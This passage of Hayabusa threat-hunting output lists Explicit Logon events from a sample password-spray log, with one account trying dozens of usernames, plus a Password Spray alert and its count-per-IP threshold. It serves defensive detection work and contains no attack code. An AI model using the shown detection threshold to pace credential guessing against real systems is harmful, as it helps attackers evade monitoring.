dpendolino | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:51.455 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: celgee | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:52.532 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: thessman | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:53.613 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: eskoudis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:54.668 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cdavis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:55.714 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mtoussain | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:56.768 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc 
| LatMov,Explicit Logon,Source User: jwrig | Target User: lschifano | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:57.850 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bhostetler | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:58.920 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: rbowes | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:00.029 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ebooth | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:01.113 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cfleener | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:02.172 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cmoody | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 
+2019-05-01 04:31:03.238 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: psmith | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:04.300 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jkulikowski | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:05.378 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: gsalinas | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:06.439 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: tbennett | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:07.513 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: econrad | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:08.581 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:09.674 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jleytevidal | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:10.754 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lpesce | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:11.843 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sanson | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:12.917 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sarmstrong | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:13.987 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: wstrzelec | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:15.045 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: 
zmathis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:16.136 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: melliott | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:17.201 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: kperryman | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:18.302 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jorchilles | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:19.372 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jlake | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:20.450 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: edygert | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:21.552 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | 
LatMov,Explicit Logon,Source User: jwrig | Target User: drook | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:22.656 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dmashburn | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:23.749 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cspizor | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:24.832 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cragoso | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:25.919 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgalbraith | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:26.998 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bking | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 
04:31:28.103 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mdouglas | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:29.187 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgreenwood | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:30.262 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: baker | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:31.362 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ssims | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:32.419 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:33.499 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: Administrator | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:34.577 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jwright | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:35.670 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dpendolino | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:36.716 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: celgee | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:37.815 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: thessman | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:38.872 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: eskoudis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:39.954 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cdavis | 
IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:41.028 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mtoussain | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:42.075 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lschifano | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:43.142 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bhostetler | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:44.208 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: rbowes | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:45.284 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ebooth | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:46.379 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | 
LatMov,Explicit Logon,Source User: jwrig | Target User: cfleener | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:47.433 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cmoody | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:48.512 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: psmith | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:49.576 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jkulikowski | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:50.656 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: gsalinas | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:51.729 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: tbennett | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 
+2019-05-01 04:31:52.823 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: econrad | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:53.886 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:54.942 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jleytevidal | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:56.019 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lpesce | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:57.107 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sanson | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:58.193 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sarmstrong | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:59.253 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: wstrzelec | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:00.320 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: zmathis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:01.393 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: melliott | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:02.451 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: kperryman | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:03.525 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jorchilles | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:03.525 +09:00,-,-,medium,CredAccess,Password Spray,[condition] count(TargetUserName) by IpAddress >= 5 in 
timeframe [result] count:14 TargetUserName:bking/edygert/drook/cragoso/ssims/jlake/jorchilles/bgreenwood/mdouglas/baker/smisenar/dmashburn/bgalbraith/cspizor IpAddress:172.16.144.128 timeframe:5m,../hayabusa-rules/hayabusa/default/alerts/Security/4648_ExplicitLogon_PW-Spray_Count.yml,- +2019-05-01 04:32:04.597 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jlake | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:05.675 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: edygert | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:06.738 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: drook | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:07.835 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dmashburn | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:08.911 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cspizor | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 
+2019-05-01 04:32:09.973 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cragoso | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:11.051 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgalbraith | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:12.146 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bking | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:13.221 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mdouglas | IP Address: 172.16.144.128 | Process: | Target Server: 